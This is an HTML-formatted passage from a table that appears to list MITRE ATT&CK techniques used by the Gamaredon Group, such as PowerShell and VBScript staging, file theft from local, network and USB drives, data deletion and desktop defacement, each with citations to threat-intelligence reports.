href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1059"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1059</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1059/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: 
normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1059"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Command and Scripting Interpreter</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1059/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">PowerShell</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, 
sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used obfuscated PowerShell scripts for staging.</span><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1059/003"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.003</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1059"><span style="font-size: 12pt; font-family: 
Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Command and Scripting Interpreter</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1059/003"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Windows Command Shell</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used various batch scripts to establish C2 and download additional files. 
</span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">'s backdoor malware has also been written to a batch file.</span><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[1]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: 
normal; vertical-align: baseline;">[8]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1059/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.005</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1059"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Command and Scripting Interpreter</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: 
</span><a href="https://attack.mitre.org/techniques/T1059/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Visual Basic</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has embedded malicious macros in document templates, which executed VBScript. 
</span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has also delivered Microsoft Outlook VBA projects with embedded macros.</span><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: 
normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a><a href="https://www.secureworks.com/research/threat-profiles/iron-tilden"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[7]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1485"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1485</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1485"><span 
style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Data Destruction</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used tools to delete files and folders from victims' desktops and profiles.</span><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); 
background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1005</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Data from Local System</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; 
vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has collected files from infected systems and uploaded them to a C2 server.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1039"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1039</span></a></p></td><td style="border-left:solid #dfdfdf 
0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1039"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Data from Network Shared Drive</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> malware has collected Microsoft Office documents from mapped network drives.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 
0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1025"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1025</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1025"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Data from Removable Media</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p 
style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">A </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives.</span><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[1]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p 
style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1491"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1491</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1491/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1491"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); 
background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Defacement</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1491/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Internal Defacement</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has left taunting images and messages on the victims' desktops as proof of system access.</span><a 